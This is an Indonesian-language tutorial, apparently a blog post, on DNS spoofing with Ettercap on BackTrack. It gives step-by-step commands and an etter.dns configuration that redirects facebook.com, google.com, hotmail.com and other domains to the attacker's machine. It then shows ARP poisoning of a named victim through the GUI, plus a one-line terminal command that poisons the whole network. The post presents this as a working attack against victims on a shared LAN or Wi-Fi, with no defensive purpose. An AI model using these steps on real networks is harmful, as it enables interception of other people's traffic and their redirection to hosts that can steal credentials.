Dns spoof dengan ettercap gui

dulu saya pernah posting cara DNS spoofing di Windows menggunakan Cain and Abel...

sekarang saya mau share Dns spoofing di Backtrack dengan Ettercap...
kebetulan masih byk yang belum tau dengan statusbaru.com ( jejaring sosial buatan Indonesia ) makanya kita alihkan www.facebook.com  pada jaringan kabel ( LAN ) ataupun Wireles...
berikut POC nya

Atur dulu dns spoof nya
buka console lalu ketikkan perintah
locate etter.dns


untuk mengetahui letak pengaturan ettercap

kemudian atur dns spoofnya di pengaturan etter.dns
gedit /usr/local/share/ettercap/etter.dns

rubah ipnya menjadi ip kamu disini ip komputer saya 192.168.1.21
rubah di bagian ini
 ################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
www.mercadolivre.com.br A 192.168.1.74
*.globo.com        A   192.168.1.74
globo.com          A   192.168.1.74
www.msn.com        A   192.168.1.74
www.hotmail.com    A   192.168.1.74
*.hotmail.com      A   192.168.1.74
www.globo.com      A   192.168.1.74
www.orkut.com      A   192.168.1.74
*.orkut.com        A   192.168.1.74
www.google.com     A   192.168.1.74
*.google.com       A   192.168.1.74
microsoft.com      A   192.168.1.74
*.microsoft.com    A   192.168.1.74
www.facebook.com      A   192.168.1.74
*.facebook.com        A   192.168.1.74
www.microsoft.com  PTR 192.168.1.74      # Wildcards in PTR are not allowed



Kita akan spoofing facebook apabila ada korban yang membuka facebook akan di arahkan ke ip kita


KALAU INGIN SEMUA SITUS DI SPOOFING CUKUP TAMBAHKAN
*A (ip pc anda) misal = *A 192.168.1.74
pada bagian bawah sendiri.Di bawah #vim:ts=8:noexpandtab



setelah itu save dengan menekan cxtr+x lalu y dan enter
Sekarang tinggal memulai spoof dengan ettercap dengan gui agar hasil maksimal untuk spoof_dns
buka terminal dan jalankan ettercap dengan perintah
ettercap -G 



lalu pilih sniff > uniffied sniffing lalu rubah interface kalian
disini saya menggunakan wlan2
lalu pilih host > scan host setelah berhasil scan lalu liat host > host list



korbann saya ada pada ip 192.168.1.20
setelah itu pilih mitm > arp poisoning > lalu centang sniff remote connection lalu ok

 dan pilih plugins > manage the plugins > pilih dns_spoof dengan menklik 2x

sekarang waktunya untuk memulai meracuni ip
dengan memilih opsi start > start sniffing
sukses spoofing



 GOOD LUCK . ..

atau kalau pingin cepet lewat terminal juga bisa
buka terminal lalu ketikkan perintah
ettercap -Tqi wlan0 -P dns_spoof -M arp // //